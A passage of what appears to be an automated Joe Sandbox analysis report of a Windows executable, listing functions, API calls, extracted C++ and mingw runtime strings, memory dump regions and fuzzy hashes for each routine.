                  • Part of subcall function 00007FF72A01D1B0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00007FF72A01BBF2,?,?,?,?,?,?,?,00007FF72A01B5FB), ref: 00007FF72A01D23A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memcpy
                • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
                • API String ID: 3510742995-1339558951
                • Opcode ID: 3ada918f618b113a2234eeefa80287dd0a0b795f4b7cdc26a74a5f7f64d380be
                • Instruction ID: 8e591b9d8321af9c87d0447b663d201a516132b4394617db80c508cca9b2b5c8
                • Opcode Fuzzy Hash: 3ada918f618b113a2234eeefa80287dd0a0b795f4b7cdc26a74a5f7f64d380be
                • Instruction Fuzzy Hash: DC51C062B1965380FF21AF599C441F8A261EF44BD4FD86572DE0D077A0FE2CE581E724
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 950b7e3b902e3005726fa7422c4e82cab78e5ea81468337b0ea846abdafc24b4
                • Instruction ID: 9f83ba2154c57df5e79ed51ae1b6f2618202a94d0202128221af47193b1a6b10
                • Opcode Fuzzy Hash: 950b7e3b902e3005726fa7422c4e82cab78e5ea81468337b0ea846abdafc24b4
                • Instruction Fuzzy Hash: 29418D22B0AA1295FA95BF15EC501B8E271FF44B90FCC8035DA0E17781EE3CEA41DB60
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memcmp$strlen
                • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
                • API String ID: 3738950036-1697194757
                • Opcode ID: c3f8e34cbadc5922aa6d578a049dc2a96b10d5c1a97c5d12a9bc863ee77ab2cf
                • Instruction ID: a579d0529a42804a64d8ba098fa03edfdce875f367f6555813329edf71e11fd2
                • Opcode Fuzzy Hash: c3f8e34cbadc5922aa6d578a049dc2a96b10d5c1a97c5d12a9bc863ee77ab2cf
                • Instruction Fuzzy Hash: 7051E492F0968681FE50AF26EE002E49251DF15BE4F9C8632EF2C577D1ED1DEB819610
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: strlen$memsetstrcmp
                • String ID: *
                • API String ID: 3639840916-163128923
                • Opcode ID: d8eb6cb4a8127c538fd93f4871f03824c6f3b091d3f30b42475bafe145940934
                • Instruction ID: 96b2f93fc8d72dd4d2c2564ea0820451d83846851f1b1a3fec8f13f4f140b0b6
                • Opcode Fuzzy Hash: d8eb6cb4a8127c538fd93f4871f03824c6f3b091d3f30b42475bafe145940934
                • Instruction Fuzzy Hash: D751A96AB04B4681FB40EF16D9143AEA7A1EB85FC4F888032DF0D477A5DE3DEA058750
                APIs
                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C51FA
                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C520C
                • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C5220
                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C522A
                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C5232
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: abortfputcfputsfreefwrite
                • String ID: what():
                • API String ID: 2053421089-593870882
                • Opcode ID: c528ee2ce49b360b72438cb081527c563e46c736580d453792cfc8967ffed01f
                • Instruction ID: 09405233d80847427d90a222c7659cd962a82fa1b3da5c26d3ed2d820a47688f
                • Opcode Fuzzy Hash: c528ee2ce49b360b72438cb081527c563e46c736580d453792cfc8967ffed01f
                • Instruction Fuzzy Hash: BF513C50E0861740FBA0BF66AC252B9D266EF45B84FC840B1ED0E472D3EE2DF6019B71
                APIs
                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C51FA
                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C520C
                • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C5220
                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C522A
                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C5232
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: abortfputcfputsfreefwrite
                • String ID: what():
                • API String ID: 2053421089-593870882
                • Opcode ID: dd95f357a4430578beb0252bc8786d15c49c00d4cf43d9fcea23fa1b758f070e
                • Instruction ID: fc7f747994b2ebc4be626128bfe954a4701f623bc82f203196dd06f3a66887e5
                • Opcode Fuzzy Hash: dd95f357a4430578beb0252bc8786d15c49c00d4cf43d9fcea23fa1b758f070e
                • Instruction Fuzzy Hash: 2B310A50E1861340FBA0BF669C6A2BD9266EF45B80FC44075D90E472D7FE1CF6019B71
                APIs
                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C51FA
                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C520C
                • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C5220
                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C522A
                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C5232
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: abortfputcfputsfreefwrite
                • String ID: what():
                • API String ID: 2053421089-593870882
                • Opcode ID: 35465102c53ad2bbfa59efcb14e74ca727752e57fb88d1b05f5bc27f5b67ac44
                • Instruction ID: 01520033938ad3ec9cabe61d0b975800866a40f80badf22e824388891f4bc6d6
                • Opcode Fuzzy Hash: 35465102c53ad2bbfa59efcb14e74ca727752e57fb88d1b05f5bc27f5b67ac44
                • Instruction Fuzzy Hash: AA314B50E0861340FBA0BB66AC6A3BD9266EF45B80FC44075D90E473D3FE1CE6019B71
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: abort
                • String ID: Error cl$eaning u$eys for $p spin_k$thread
                • API String ID: 4206212132-3545615192
                • Opcode ID: 07ddf223fce23e3bbbdea389a97b49fa8b6e2c9f00ae33dc74b79853caab605a
                • Instruction ID: 9b60a16017f6cea8bfc395137bb71e5a14f7a80688f3cd0be89f0d88e121df04
                • Opcode Fuzzy Hash: 07ddf223fce23e3bbbdea389a97b49fa8b6e2c9f00ae33dc74b79853caab605a
                • Instruction Fuzzy Hash: 72313272B04B50CEFB50DFA9E8543AD33B5E704788F644128DA4C6BB98CF389A119B90
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memcpy
                • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
                • API String ID: 3510742995-126128797
                • Opcode ID: 27880dd7a50bb7ebc01d8a8b18d1c7de1befbfbd7983a268b24b76310a416573
                • Instruction ID: f5153b797066bfc3e211a00785992f6bdfa3208da42448fd83fb9263a0d2a7ed
                • Opcode Fuzzy Hash: 27880dd7a50bb7ebc01d8a8b18d1c7de1befbfbd7983a268b24b76310a416573
                • Instruction Fuzzy Hash: F8519273B09B4284FB21AF65EC806ACB364E715F98F949172CA5C07395EE39D992C710
                APIs
                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000000,00000000,00007FF729FB8CDF,?,?,?,?,?,?,00000000,?,00007FF729FA8E93), ref: 00007FF72A0751A2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memcpy
                • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
                • API String ID: 3510742995-126128797
                • Opcode ID: e2845378e4123b13abf0210f9dd79c6ee0a1ac215ef50119aed81cdf3020174e
                • Instruction ID: c78b1640e62fa9c3c628f67e0edb7fa4d6d26f1058ce29b89b6259ff2981c504
                • Opcode Fuzzy Hash: e2845378e4123b13abf0210f9dd79c6ee0a1ac215ef50119aed81cdf3020174e
                • Instruction Fuzzy Hash: CA51B373B09B8280FB21AF65EC402ACB364E715F98F949172CA5C07395EE38E993C710
                APIs
                • wcslen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF72A077E03
                  • Part of subcall function 00007FF72A0764D0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00007FF729FD4D48), ref: 00007FF72A076562
                  • Part of subcall function 00007FF72A0764D0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00007FF729FD4D48), ref: 00007FF72A076585
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memcpy$wcslen
                • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$%s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert$basic_string::replace$basic_string::replace
                • API String ID: 1844840824-3350440205
                • Opcode ID: 6c0195795bb4533eb4a6dba330c2b5e75ffbc706ba8ddfa38d83fc91dad8c8bc
                • Instruction ID: c4250f8f5584ddf03acc4c3f454a7881c57a4908bb01ea8230815c51234683be
                • Opcode Fuzzy Hash: 6c0195795bb4533eb4a6dba330c2b5e75ffbc706ba8ddfa38d83fc91dad8c8bc
                • Instruction Fuzzy Hash: 9541D552B05A9781FB20FBA5ED118B9A311EB69BC4FC055B1EA4C03761FE3CE645CB10
                APIs
                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00007FF729F8C557), ref: 00007FF729F8C273
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: __acrt_iob_func
                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                • API String ID: 711238415-1534286854
                • Opcode ID: cd10f0ef7a6ea509f53a95e70f294f78c7a81a764840871de163e2df2c3c0a85
                • Instruction ID: 4e383cfc30cd930f75c55f5f9a11d786c3b580e4af1addd6bc927d6c037fba45
                • Opcode Fuzzy Hash: cd10f0ef7a6ea509f53a95e70f294f78c7a81a764840871de163e2df2c3c0a85
                • Instruction Fuzzy Hash: 2C7149A2F05B068AEB94DB55EC812A8A3B1FB58BC4F944035DE0C97754EF3CEA01DB50
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: strtoul
                • String ID: /mingw/include/httplib.h$chunk_len == 0
                • API String ID: 3805803174-3103630078
                • Opcode ID: 5c64dcc224694101c24fa3a9f11db741598c88eed4ff1d7dab5289c0ddf78d9d
                • Instruction ID: 9942830b0a9782439fd7ab7415be99c4fea0b0e93dc75c8f54f1b8a0d36ac8a9
                • Opcode Fuzzy Hash: 5c64dcc224694101c24fa3a9f11db741598c88eed4ff1d7dab5289c0ddf78d9d
                • Instruction Fuzzy Hash: DD715E21F0974298FFA0EE619C643F9A375EB19788FC80075DE0D17796EE2CD6449B20
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: exit
                • String ID: ($(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)$../../../mingw-w64-libraries/winpthreads/src/rwlock.c$Assertion failed: (%s), file %s, line %d
                • API String ID: 2483651598-1678677298
                • Opcode ID: 3c16262fbe96be88181feed3cd21b7695a7f88826d3af0ec9749feff659bd2b0
                • Instruction ID: 2ea465010efe5cd057db6d63a559e67a4f4b071c7543f4ac5e11b0013a57da6e
                • Opcode Fuzzy Hash: 3c16262fbe96be88181feed3cd21b7695a7f88826d3af0ec9749feff659bd2b0
                • Instruction Fuzzy Hash: 1E115176A04B468AFB44EF29DC841A8B7B0FB84B84F848436D90C07365EE3CD6559B64
                APIs
                Strings
                Memory Dump Source
